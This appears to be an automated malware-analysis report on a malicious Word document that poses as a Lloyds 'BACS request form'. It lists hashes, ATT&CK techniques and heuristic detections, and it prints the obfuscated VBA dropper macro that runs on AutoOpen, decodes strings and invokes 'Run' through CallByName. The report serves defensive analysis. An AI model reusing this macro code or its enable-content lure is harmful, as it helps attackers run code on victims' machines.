Office (OLE) malware analysis — malicious · cd59ec785e1d367a

MALICIOUS

Office (OLE)

81.0 KB Created: 2018-04-05 09:46:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: fa9762828cf25f0182cc5a6781e708da SHA-1: ba7d988fa3e44133ec65c2cc0d3741efab82b762 SHA-256: cd59ec785e1d367a1c45aa7bf1e092e1f014153722641a76fef14d700ad7ed06

282 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Word document containing VBA macros. The document body presents a fake 'INCOMING BACS REQUEST FORM' and instructs the user to 'ENABLE EDITING and then ENABLE CONTENT' to auto-fill the form, which is a common social engineering lure. The VBA macro 'macros.bas' contains an 'AutOOpen' subroutine and uses 'CreateObject' and 'CallByName' functions, indicative of malicious intent. The script attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy, likely to download and execute a second-stage payload.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6496095-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6496095-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://onlinebusiness.lloydsbank.co.uk/wps/wcm/connect/content_lloyds_business_banking/assets/media/images/lloydstsb2009/miscellaneous/logo-.png In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7897 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7897 bytes
SHA-256: `16ee43bd3d5dd6f7dd09afb8690fd6e94240c7f9e0c67e3d521e7fea11c45638`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutOOpen() soartone tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 End Sub Attribute VB_Name = "borobelH" Function tommyandy() tommyandy = undeaddos.goldlulu End Function Sub elvismac(vokhserehS) nbf = "Run" nbf0 = 0 nbf1 = True CallByName vokhserehS, nbf, VbMethod, loganone.nissanhawk, nbf0, nbf1 End Sub Function JULY1951(shorenap, spriteicq) JULY1951 = Mid(shorenap, spriteicq, 1) End Function Function february1247(HCIVOTULP, inTenDo22, parker4444, volifartS) tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 loganone.nissanhawk = jasminlulu(HCIVOTULP, inTenDo22) + lomevein(HCIVOTULP, parker4444) + vonlebaT(volifartS) End Function Function iinnayrezO(wharfgur As String, meobench As Integer) As String Dim bulltopher As Integer bulltopher = 0 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 For LTVFUJUB = 1 To 90 If (JULY1951(tommyandy, LTVFUJUB) = wharfgur) Then bulltopher = LTVFUJUB tellbron = 76 + 120 tellbron = 32 + 8 tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 Exit For End If Next LTVFUJUB tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 bulltopher = IIf(bulltopher - meobench <= 0, 90 + bulltopher - meobench, bulltopher - meobench) iinnayrezO = JULY1951(tommyandy, bulltopher) End Function Function whales600() whales600 = ram72603.heagueur End Function Function beaner2001() beaner2001 = loganone.ohkhfozA End Function Function dogtoothdogtooth() dogtoothdogtooth = "m;]Qgm;]/u/ayEmaQRcasglaiuhEs/l" End Function Function perry192() perry192 = "]/oui.g/nEmaE]jRcasglaiuhEs/l" End Function Function lomevein(gathbill, AVOFATDAN) tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 lomevein = petevision(ram72603.missdrin) + AVOFATDAN + petevision(ram72603.leicht01) + _ AVOFATDAN + petevision(ram72603.jennamec) + gathbill + _ petevision(ram72603.cephheug + perry192 + ram72603.maico500) + gathbill + petevision(ram72603.cephheug) End Function Attribute VB_Name = "chiterochek" Function deutschne() deutschne = undeaddos.raygaitp End Function Function mqundwxb() mqundwxb = loganone.alemeltp End Function Sub soartone() Randomize tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 undeaddos.reenrasta = "Mnfubdlc" End Sub Function petevision(prototnv) Itfktljg = "" tellbron = 76 + 120 tellbron = 32 + 8 tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 foobarnat = Len(prototnv) For ANIHINAPORT = 1 To foobarnat tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = tellbron - 75 * tellbron - 7 tellbron = 53 * 133 + 6 Itfktljg = Itfktljg + iinnayrezO(JULY1951(prototnv, ANIHINAPORT), 4) Next ANIHINAPORT tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 petevision = Itfktljg End Function Function jasminlulu(prabordw, dosfreddy) tellbron = 76 + 120 tellbron = 32 + 8 tellbron = tellbron - tellbro tellbron = 108 + 44 + 48 * 13 tellbron = tellbron - 75 * tellbron - 7 tellbron = ... (truncated)

SHA-256: 16ee43bd3d5dd6f7dd09afb8690fd6e94240c7f9e0c67e3d521e7fea11c45638

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
soartone
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
End Sub


Attribute VB_Name = "borobelH"
Function tommyandy()
tommyandy = undeaddos.goldlulu
End Function

Sub elvismac(vokhserehS)
nbf = "Run"
nbf0 = 0
nbf1 = True
CallByName vokhserehS, nbf, VbMethod, loganone.nissanhawk, nbf0, nbf1
End Sub

Function JULY1951(shorenap, spriteicq)
JULY1951 = Mid(shorenap, spriteicq, 1)
End Function

Function february1247(HCIVOTULP, inTenDo22, parker4444, volifartS)
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
loganone.nissanhawk = jasminlulu(HCIVOTULP, inTenDo22) + lomevein(HCIVOTULP, parker4444) + vonlebaT(volifartS)
End Function

Function iinnayrezO(wharfgur As String, meobench As Integer) As String
Dim bulltopher As Integer
bulltopher = 0
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
For LTVFUJUB = 1 To 90
If (JULY1951(tommyandy, LTVFUJUB) = wharfgur) Then
   bulltopher = LTVFUJUB
   tellbron = 76 + 120
tellbron = 32 + 8
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
    Exit For
End If
Next LTVFUJUB
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
bulltopher = IIf(bulltopher - meobench <= 0, 90 + bulltopher - meobench, bulltopher - meobench)
iinnayrezO = JULY1951(tommyandy, bulltopher)
End Function

Function whales600()
whales600 = ram72603.heagueur
End Function

Function beaner2001()
beaner2001 = loganone.ohkhfozA
End Function

Function dogtoothdogtooth()
dogtoothdogtooth = "m;]Qgm;]/u/ayEmaQRcasglaiuhEs/l"
End Function

Function perry192()
perry192 = "]/oui.g/nEmaE]jRcasglaiuhEs/l"
End Function

Function lomevein(gathbill, AVOFATDAN)
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
lomevein = petevision(ram72603.missdrin) + AVOFATDAN + petevision(ram72603.leicht01) + _
AVOFATDAN + petevision(ram72603.jennamec) + gathbill + _
petevision(ram72603.cephheug + perry192 + ram72603.maico500) + gathbill + petevision(ram72603.cephheug)
End Function


Attribute VB_Name = "chiterochek"
Function deutschne()
deutschne = undeaddos.raygaitp
End Function

Function mqundwxb()
mqundwxb = loganone.alemeltp
End Function

Sub soartone()
Randomize
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
undeaddos.reenrasta = "Mnfubdlc"
End Sub

Function petevision(prototnv)
Itfktljg = ""
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
foobarnat = Len(prototnv)
For ANIHINAPORT = 1 To foobarnat
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = tellbron - 75 * tellbron - 7
tellbron = 53 * 133 + 6
Itfktljg = Itfktljg + iinnayrezO(JULY1951(prototnv, ANIHINAPORT), 4)
Next ANIHINAPORT
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
petevision = Itfktljg
End Function

Function jasminlulu(prabordw, dosfreddy)
tellbron = 76 + 120
tellbron = 32 + 8
tellbron = tellbron - tellbro
tellbron = 108 + 44 + 48 * 13
tellbron = tellbron - 75 * tellbron - 7
tellbron =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.